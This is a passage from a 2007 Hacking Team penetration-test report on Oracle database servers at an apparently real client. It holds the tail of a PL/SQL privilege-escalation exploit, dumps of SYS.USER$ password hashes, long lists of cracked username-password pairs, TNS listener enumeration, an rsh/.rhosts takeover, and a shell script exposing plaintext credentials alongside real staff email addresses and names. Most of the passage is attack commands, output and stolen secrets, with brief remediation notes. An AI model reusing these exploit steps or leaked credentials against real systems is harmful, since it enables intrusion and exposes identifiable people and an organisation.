TYPE_SCHEMA := 'APPLSYSPUB';
VERSION := '';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
select * from user_role_privs;
select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
APPLSYSPUB ALTER SESSION NO
APPLSYSPUB CREATE SESSION NO
APPLSYSPUB CREATE SYNONYM NO
APPLSYSPUB UNLIMITED TABLESPACE NO
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
APPLSYSPUB DBA NO YES NO
It was possible to crack most of the authentication hashes:
Hashed Clear text
SYS:6ACFD13B9C86F98F
SYSTEM:AD47C8AA621F0072
OUTLN:4A3BA55E08595C81
HR:4C6D73C3E8B0F0DA
ORDSYS:7EFA02EC7EA6B86F
ORDPLUGINS:88A2B2C183431F00
MDSYS:72979A94BAD2AF80
CUS:CUS
PJM:PJM
ASL:ASL
ENI:ENI
IPD:IPD
CSMIG:CSMIG
ECX:ECX
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 372 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
CTXSYS:24ABAB8B06281B4C
OWAPUB:6696361B64F9E0A9
APPLSYS:E153FFF4DAE6C9F7
APPLSYSPUB:D2E3EF40EE87221E
ALR:BE89B24F9F8231A9
AX:0A8303530E86FCDD
AK:8FCB78BBA8A59515
XLA:2A8ED59E27D86D41
GL:CD6E99DACE4EA3A6
RG:0FAA06DA0F42F21F
FA:21A837D0AED8F8E5
FEM:BD63D79ADF5262E7
SSP:87470D6CE203FB4D
BEN:9671866348E03616
HXT:169018EB8E2C4A77
OTA:F5E498AC7009A217
RLA:C1959B03F36C9BB2
VEH:72A90A786AAE2914
QA:C7AEAA2D59EB1EAE
ICX:7766E887AF4DCC46
AZ:AAA18B5D51B0D5AC
BIS:7E9901882E5F3565
PN:D40D0FEF9C8DC624
HXC:4CEA0BF02214DA55
RLM:4B16ACDA351B557D
VEA:D38D161C22345902
POM:123CF56E05D4EF3C
FRM:9A2A7E2EBE6E4F71
ABM:D0F2982F121C7840
BSC:EC481FD7DCE6366A
EAA:A410B2C5A0958CDF
EVM:137CEDC20DE69F71
CS:DB78866145D4E1C3
AP:EED09A552944B6AD
AR:BBBFE175688DED7E
OE:D1A2DFC623FDA40A
OSM:106AE118841A5D8C
PA:8CE2703752DB36D8
CN:73F284637A54777D
AX:AX
IBU:IBU
IBA:IBA
REPORTS:REPORTS
OZS:OZS
CSR:CSR
RG:RG
OSM:OSM
QP:QP
POM:POM
EVM:EVM
CSD:CSD
HXT:HXT
IGF:IGF
OPI:OPI
MWA:MWA
ASG:ASG
FA:FA
CTXSYS:CTXSYS
PSB:PSB
XLA:XLA
POA:POA
FTE:FTE
IES:IES
OKC:OKC
PO:PO
ISC:ISC
JG:JG
IEM:IEM
AMV:AMV
MSO:MSO
CSS:CSS
XNP:XNP
BIX:BIX
CUN:CUN
GMP:GMP
ENG:ENG
TOAD:TOAD
JL:JL
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 373 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MFG:FC1B0DD35E790847
INV:ACEAB015589CF4BC
PO:355CBEC355C10FEF
BOM:56DB3E89EAE5788E
ENG:4553A3B443FB3207
MRP:B45D4DF02D4E0C85
CRP:F165BDE5462AD557
WIP:D326D25AE0A0355C
CZ:9B667E9C5A0D21A6
PJM:021B05DBB892D11F
FLM:CEE2C4B59E7567A3
MSC:89A8C104725367B2
XTR:A43EE9629FA90CAE
RHX:FFDF6A0C8C96E676
BIX:3DD36935EAEDE2E3
CE:E7FDFE26A524FE39
EC:6A066C462B62DD46
JG:37A99698752A1CF1
JE:FBB3209FD6280E69
JA:9AC2B58153C23F3D
JL:489B61E488094A8D
GMA:DC7948E807DFE242
GMD:E269165256F22F01
GME:B2F0E221F45A228F
GMF:A07F1956E3E468E1
GMI:82542940B0CF9C16
GML:5F1869AD455BBA73
GMP:450793ACFCC7B58E
GR:F5AB0AA3197AEE42
PMI:A7F7978B21A6F65E
CUS:00A12CC6EBF8EDB8
CUI:AD7862E01FA80912
CUN:41C2D31F3C85A79D
CUP:C03082CD3B13EC42
JTF:5C5F6FC2EBB94124
FPT:73E3EC9C0D1FAECF
IEO:E93196E9196653F1
OKC:31C1DDF4D5D63FE6
OKS:C2B4C76AB8257DF5
HRI:HRI
OUTLN:OUTLN
RLM:RLM
HR:HR
HXC:HXC
PSP:PSP
WPS:WPS
BOM:BOM
CSP:CSP
JTF:JTF
IEU:IEU
GML:GML
BIM:BIM
OWAPUB:OWAPUB
CSF:CSF
EC:EC
MSD:MSD
IEX:IEX
MDSYS:MDSYS
VEH:VEH
FPT:FPT
CN:CN
WSM:WSM
PV:PV
ICX:ICX
BIS:BIS
ORDSYS:ORDSYS
GMI:GMI
CUF:CUF
IBP:IBP
MTS_CUST:MTS_CUST
SSP:SSP
ORDPLUGINS:ORDPLUGINS
MSC:MSC
IGI:IGI
PA:PA
AK:AK
FV:FV
XNM:XNM
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 374 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
CSC:EDECA9762A8C79CD
BIC:E84CC95CBBAC1B67
CSD:144441CEBAFC91CF
ASF:B6FD427D08619EEE
CSF:684E28B3C899D42C
ME:E5436F7169B29E4D
AMS:BD821F59270E5F34
AMV:38BC87EB334A1AC4
BIM:6026F9A8A54B9468
XNM:92776EA17B8B5555
XNP:3D1FB783F96D1F5E
XDP:F05E53C662835FA2
BIL:BF24BCE2409BE1F7
XNC:BD8EA41168F6C664
IES:30802533ADACFE14
XNS:FABA49C38150455E
CSS:3C6B8C73DDC6B04F
CUA:CB7B2E6FFDD7976F
AST:F13FF949563EAB3C
CCT:C6AF8FCA0B51B32F
IBP:840267B7BD30C82E
IBA:0BD475D5BF449C63
IBY:F483A48F6A8C51EC
IBE:9D41D2B3DD095227
IBU:0AD9ABABC74B3057
FII:CF39DE29C08F71B9
HRI:49A3A09B8FC291D0
ISC:373F527DC0CFAE98
OPI:1BF23812A0AEEDA0
POA:2AB40F104D8517A0
MSO:3BAA3289DB35813C
ONT:9E3C81574654100A
QP:10A40A72991DCA15
WSH:D4D76D217B02BD7A
MSD:6A29482069E23675
WMS:D7837F182995E381
WPS:50D22B9D18547CF7
CUF:82959A9BD2D51297
IGS:DAF602231281B5AC
BEN:BEN
OZF:OZF
FRM:FRM
JA:JA
CZ:CZ
IBE:IBE
ONT:ONT
GMF:GMF
CUE:CUE
MONITOR:MONITOR
EAA:EAA
XTR:XTR
IEB:IEB
PMI:PMI
AZ:AZ
PERFSTAT:PERFSTAT
INV:INV
CUI:CUI
GME:GME
IGW:IGW
MRP:MRP
OZP:OZP
ASF:ASF
OKE:OKE
OKR:OKR
AR:AR
FEM:FEM
AMS:AMS
XNC:XNC
ALR:ALR
BIL:BIL
CUP:CUP
RLA:RLA
OKS:OKS
CCT:CCT
QA:QA
MSR:MSR
CUA:CUA
GL:GL
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 375 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPA:EB265A08759A15B4
ASG:1EF8D8BD87CF16BE
IEX:6CC978F56D21258D
OKX:F9FDEB0DE52F5D6B
ASO:F712D80109E3C9D8
CSP:5746C5E077719DB4
OZF:970B962D942D0C75
OZP:B650B1BB35E86863
OZS:0DABFF67E0D33623
IEU:5D0E790B9E882230
IEM:37EF7B2DD17279B5
OKE:B7C1BB95646C16FE
ECX:0A30645183812087
GMS:E654261035504804
IGW:B39565F4E3CF744B
PSB:28EE1E024FC55E66
PSP:4FE07360D435E2F0
CSR:0E0F7C1B1FE3FA32
IEB:A695699F0F71C300
IGF:1740079EFF46AB81
WSM:750F2B109F49CC13
MWA:1E2F06BE2A1D41A6
FV:907D70C0891A85B1
IGC:D33CEB8277F25346
PSA:FF4B266F9E61F911
APPS:D728438E8A5925E0
ENI:05A92C0958AFBCBC
CSMIG:09B4BB013FBD0D65
PV:76224BCC80895D3D
ASL:03B20D2C323D0BFE
DBSNMP:E066D214D5421CCC
AURORA$JIS$UTILITY$:-000001331089491
OSE$HTTP$ADMIN:-000000981346846
AURORA$ORB$UNAUTHENTICATED:0000003818586
11
EAM:CE8234D92FCFB563
FTE:2FB4D2C9BAE2CCCA
IGI:8C69D50E9D92B9D0
ITG:D90F98746B68E6CA
EAM:EAM
FLM:FLM
FII:FII
ABM:ABM
OE:OE
APPLSYSPUB:PUB
WIP:WIP
IGC:IGC
VEA:VEA
PN:PN
WSH:WSH
APPS:APPS
WMS:WMS
ITG:ITG
IGS:IGS
CS:CS
GMA:GMA
DBSNMP:DBSNMP
APPLSYS:APPS
GMD:GMD
ME:ME
GMS:GMS
RMAN:RMAN
CE:CE
BIC:BIC
QUEST:QUEST
IEO:IEO
IPA:IPA
BSC:BSC
CSC:CSC
AP:AP
XDP:XDP
AST:AST
CRP:CRP
IBY:IBY
GR:GR
OTA:OTA
ASO:ASO
OKX:OKX
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 376 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MSR:C9D53D00FE77D813
IPD:066A2E3072C1F2F3
MTS_CUST:86E15884BE279BA0
CUE:A219FE4CA25023AA
OKR:BB0E28666845FCDC
TOAD:4759257F78A8B5A3
MONITOR:A3A1625C0BBFBB11
PERFSTAT:AC98877DE1297365
QUEST:E8A8AF58845EBCF7
RMAN:E7B5D92911C831E1
REPORTS:0D9D14FE6653CF69
XNS:XNS
JE:JE
MFG:MFG
PSA:PSA
RHX:RHX
7.1.5 100.100.245.21 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 10.2.0.1.0
Compromised Compromised Directly Info Priv. Escalation to DBA
Auth Not detected
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by queryng the TNS Listener:
oracle@&ORCL:/opt/oracle/product/9.2.0/network/admin>lsnrctl
LSNRCTL for Solaris: Version 9.2.0.1.0 - Production on 02-SEP-2007 20:27:14
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener 192.168.254.21
Current Listener is 192.168.254.21
LSNRCTL> version
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 377 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.21))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.21)(PORT=1521)))
TNSLSNR for Solaris: Version 10.2.0.1.0 - Production
TNS for Solaris: Version 10.2.0.1.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
10.2.0.1.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 10.2.0.1.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 10.2.0.1.0 -
Production,,
The command completed successfully
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.21))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.21)(PORT=1521)))
TNS-12618: TNS:versions are incompatible
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.21))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.21)(PORT=1521)))
TNS-12618: TNS:versions are incompatible
LSNRCTL>
Passwordless TNS Listener allow arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
# rsh -l oracle 192.168.254.21
Last login: Wed Aug 15 16:04:51 from vcasulli.mtsgro
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have mail.
$ id
uid=102(oracle) gid=101(dba)
$ ls
#Noted Sun_09:42:44# apt dwa_auth local.login
script.sql vito
Mail bondindex java local.profile
temp workflow
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 378 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
analyze dump local.cshrc pippo.log
util
$ bash
bash-3.00$ sqlplus / as sysdba
SQL*Plus: Release 10.2.0.1.0 - Production on Mon Sep 3 03:51:33 2007
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bit Production
With the Partitioning, OLAP and Data Mining options
Session altered.
SQL> show user;
USER is "SYS"
SQL> select * from user_role_privs;
select * from user_sys_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DBA YES YES NO
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EJBCLIENT YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS JAVADEBUGPRIV YES YES NO
SYS JAVAIDPRIV YES YES NO
SYS JAVASYSPRIV YES YES NO
SYS JAVAUSERPRIV YES YES NO
SYS JAVA_ADMIN YES YES NO
SYS JAVA_DEPLOY YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS MGMT_USER YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 379 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
SYS OLAP_DBA YES YES NO
SYS OLAP_USER YES YES NO
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDBWEBSERVICES YES YES NO
32 rows selected.
SQL>
SQL> SELECT NAME, PASSWORD FROM SYS.USER$;
NAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
OUTLN 4A3BA55E08595C81
RECOVERY_CATALOG_OWNER
GATHER_SYSTEM_STATISTICS
LOGSTDBY_ADMINISTRATOR
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
GLOBAL_AQ_USER_ROLE GLOBAL
SCHEDULER_ADMIN
DIP CE4A36B8E06CA59C
HS_ADMIN_ROLE
DMSYS BFBA5A553FD9E28A
AUTHENTICATEDUSER
TSMSYS 3DF26A8B17D0F29F
OEM_ADVISOR
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 380 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OEM_MONITOR
DBSNMP E066D214D5421CCC
WMSYS 7C9BA362F8314299
WM_ADMIN_ROLE
JAVAUSERPRIV
JAVAIDPRIV
JAVASYSPRIV
JAVADEBUGPRIV
EJBCLIENT
JAVA_ADMIN
JAVA_DEPLOY
EXFSYS 66F4EF5650C20355
CTXSYS 71E687F036AD56E5
CTXAPP
XDB 88D8364765FCE6AF
ANONYMOUS anonymous
XDBADMIN
TOAD 4759257F78A8B5A3
OLAPSYS 3FB8EF9DB538647C
XDBWEBSERVICES
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
OUTLN 4A3BA55E08595C81
RECOVERY_CATALOG_OWNER
GATHER_SYSTEM_STATISTICS
LOGSTDBY_ADMINISTRATOR
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
GLOBAL_AQ_USER_ROLE GLOBAL
SCHEDULER_ADMIN
DIP CE4A36B8E06CA59C
HS_ADMIN_ROLE
DMSYS BFBA5A553FD9E28A
AUTHENTICATEDUSER
TSMSYS 3DF26A8B17D0F29F
OEM_ADVISOR
OEM_MONITOR
DBSNMP E066D214D5421CCC
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 381 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
WMSYS 7C9BA362F8314299
WM_ADMIN_ROLE
JAVAUSERPRIV
JAVAIDPRIV
JAVASYSPRIV
JAVADEBUGPRIV
EJBCLIENT
JAVA_ADMIN
JAVA_DEPLOY
EXFSYS 66F4EF5650C20355
CTXSYS 71E687F036AD56E5
CTXAPP
XDB 88D8364765FCE6AF
ANONYMOUS anonymous
XDBADMIN
TOAD 4759257F78A8B5A3
OLAPSYS 3FB8EF9DB538647C
XDBWEBSERVICES
ORDSYS 7EFA02EC7EA6B86F
ORDPLUGINS 88A2B2C183431F00
SI_INFORMTN_SCHEMA 84B8CBCA4D477FA3
MDSYS 72979A94BAD2AF80
SYSMAN 447B729161192C24
OLAP_DBA
OLAP_USER
MDDATA DF02A496267DEE66
REPUSER 96EEA3C871AD5D6B
MGMT_USER
MGMT_VIEW CF114B59593139DA
SCOTT F894844C34402B67
ATSSDP 67A6FCE962536631
PLUSTRACE
TC_ADMIN_ROLE
TC_MGR_ROLE
TC_LDR_ROLE
BONDINDEX 94CF69B89450423E
_NEXT_USER
OMWB_EMULATION 54A85D2A0AB8D865
DWA_AUTH 37BCFE3A49FE51AA
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 382 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
DWA D51380368622A586
CSMIG 09B4BB013FBD0D65
MARKETVIEW F3AF6468FC5D3DF7
VCASULLI ECB6E6332F6A6A1C
APPS D728438E8A5925E0
HISTORIC E563DF9E870FD42A
ATSMRC 1FFD6D4DAB02B519
APPSN F4F3C0C5226B35F6
MUM_TEST 22D11FABC3A69487
MUM_PROD 970079CE27142D7E
MAX 7379B2784F7B7D8D
77 rows selected.
SQL>
It was possible to crack most of the authentication hashes:
Hashed Clear text
SYS:D4C5016086B2DC6A
SYSTEM:D4DF7931AB130E37
OUTLN:4A3BA55E08595C81
GLOBAL_AQ_USER_ROLE:GLOBAL
DIP:CE4A36B8E06CA59C
DMSYS:BFBA5A553FD9E28A
TSMSYS:3DF26A8B17D0F29F
DBSNMP:E066D214D5421CCC
WMSYS:7C9BA362F8314299
EXFSYS:66F4EF5650C20355
CTXSYS:71E687F036AD56E5
XDB:88D8364765FCE6AF
ANONYMOUS:anonymous
TOAD:4759257F78A8B5A3
OLAPSYS:3FB8EF9DB538647C
OUTLN:4A3BA55E08595C81
GLOBAL_AQ_USER_ROLE:GLOBAL
DIP:CE4A36B8E06CA59C
DMSYS:BFBA5A553FD9E28A
TSMSYS:3DF26A8B17D0F29F
DBSNMP:E066D214D5421CCC
WMSYS:7C9BA362F8314299
CSMIG:CSMIG
ATSMRC:ATSMRC
MUM_TEST:MUM_TEST
DWA_AUTH:DWA_AUTH
TSMSYS:TSMSYS
OLAPSYS:MANAGER
SYSMAN:SYSMAN
TOAD:TOAD
OUTLN:OUTLN
OMWB_EMULATION:ORACLE
EXFSYS:EXFSYS
ATSSDP:ATSSDP
CTXSYS:CHANGE_ON_INSTALL
MDSYS:MDSYS
MAX:MAX
WMSYS:WMSYS
ORDSYS:ORDSYS
SI_INFORMTN_SCHEMA:SI_INFORMTN_SCHEMA
ORDPLUGINS:ORDPLUGINS
XDB:CHANGE_ON_INSTALL
BONDINDEX:BONDINDEX
REPUSER:REPUSER
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 383 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
EXFSYS:66F4EF5650C20355
CTXSYS:71E687F036AD56E5
XDB:88D8364765FCE6AF
ANONYMOUS:anonymous
TOAD:4759257F78A8B5A3
OLAPSYS:3FB8EF9DB538647C
ORDSYS:7EFA02EC7EA6B86F
ORDPLUGINS:88A2B2C183431F00
SI_INFORMTN_SCHEMA:84B8CBCA4D477FA3
MDSYS:72979A94BAD2AF80
SYSMAN:447B729161192C24
MDDATA:DF02A496267DEE66
REPUSER:96EEA3C871AD5D6B
MGMT_VIEW:CF114B59593139DA
SCOTT:F894844C34402B67
ATSSDP:67A6FCE962536631
BONDINDEX:94CF69B89450423E
OMWB_EMULATION:54A85D2A0AB8D865
DWA_AUTH:37BCFE3A49FE51AA
DWA:D51380368622A586
CSMIG:09B4BB013FBD0D65
MARKETVIEW:F3AF6468FC5D3DF7
VCASULLI:ECB6E6332F6A6A1C
APPS:D728438E8A5925E0
HISTORIC:E563DF9E870FD42A
ATSMRC:1FFD6D4DAB02B519
APPSN:F4F3C0C5226B35F6
MUM_TEST:22D11FABC3A69487
MUM_PROD:970079CE27142D7E
MAX:7379B2784F7B7D8D
MUM_PROD:MUM_PROD
DMSYS:DMSYS
DIP:DIP
SYS:CHANGE_ON_INSTALL
SYSTEM:MANAGER
DWA:DWA
APPS:APPS
MDDATA:MDDATA
DBSNMP:DBSNMP
HISTORIC:HISTORIC
VCASULLI:VCASULLI
MARKETVIEW:MARKETVIEW
APPSN:APPSN
SCOTT:TIGER
7.1.6 100.100.245.22 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files © 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 384 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 9.2.0.6.0
Compromised Compromised Directly Info Priv. Escalation to DBA
Auth Not detected
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by queryng the TNS Listener:
oracle@&ORCL:/opt/oracle/product/9.2.0/network/admin>lsnrctl
LSNRCTL for Solaris: Version 9.2.0.1.0 - Production on 02-SEP-2007 20:17:20
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener 192.168.254.22
Current Listener is 192.168.254.22
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.22))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.22)(PORT=1521)))
TNSLSNR for Solaris: Version 9.2.0.6.0 - Production
TNS for Solaris: Version 9.2.0.6.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
9.2.0.6.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 9.2.0.6.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 9.2.0.6.0 - Production,,
The command completed successfully
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.22))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.22)(PORT=1521)))
Services Summary...
Service "ORCL" has 1 instance(s).
Instance "ORCL", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:114839 refused:0 state:ready
LOCAL SERVER
Service "PLSExtProc" has 1 instance(s).© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 385 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1 refused:0
LOCAL SERVER
The command completed successfully
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.22))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.22)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Solaris: Version 9.2.0.6.0 - Production
Start Date 07-JUN-2007 00:29:46
Uptime 87 days 19 hr. 50 min. 3 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /opt/oracle/OraHome1/network/admin/listener.ora
Listener Log File /opt/oracle/OraHome1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milsunats-inet)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary...
Service "ORCL" has 1 instance(s).
Instance "ORCL", status READY, has 1 handler(s) for this service...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
Multiple account and passwords were found in a custom local file:
oracle@milsunats-inet&ORCL:/export/home/oracle/util>cat connect_db
#!/usr/bin/ksh
export username_adm=atsadmin
export password_adm=atsadmin
export username_cmf=atscmf
export password_cmf=newv3rs10n
export username=market
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 386 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
export password=market
export userswap=atsswap
export passswap=F1nal1y
export userbv=mtsnet
export passbv=mtsnet
export username_admin=admin
export password_admin=adm1n1strat0r
export admins="[email protected]"
export ora_admins="[email protected]"
export
accounting="[email protected],[email protected],battaglia_andrea@mtsspa
.it,[email protected]"
oracle@milsunats-inet&ORCL:/export/home/oracle/util>uname -a
SunOS milsunats-inet 5.9 Generic_117171-09 sun4u sparc SUNW,Sun-Fire-V240
oracle@milsunats-inet&ORCL:/export/home/oracle/util>id
uid=102(oracle) gid=100(dba)
Passwordless TNS Listener allows arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
oracle@milsunats-inet&ORCL:/export/home/oracle>sqlplus "/ as sysdba"
SQL*Plus: Release 9.2.0.6.0 - Production on Mon Sep 3 04:02:20 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production
With the Partitioning and OLAP options
JServer Release 9.2.0.6.0 - Production
SQL> show user;
USER is "SYS"
SQL>
SQL> SELECT NAME, PASSWORD FROM SYS.USER$;
NAME PASSWORD
------------------------------ ------------------------------
SYS B3FDF88DC629C79B
PUBLIC
CONNECT
RESOURCE
DBA
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 387 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
SYSTEM AD47C8AA621F0072
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
NAME PASSWORD
------------------------------ ------------------------------
OUTLN 4A3BA55E08595C81
RECOVERY_CATALOG_OWNER
GATHER_SYSTEM_STATISTICS
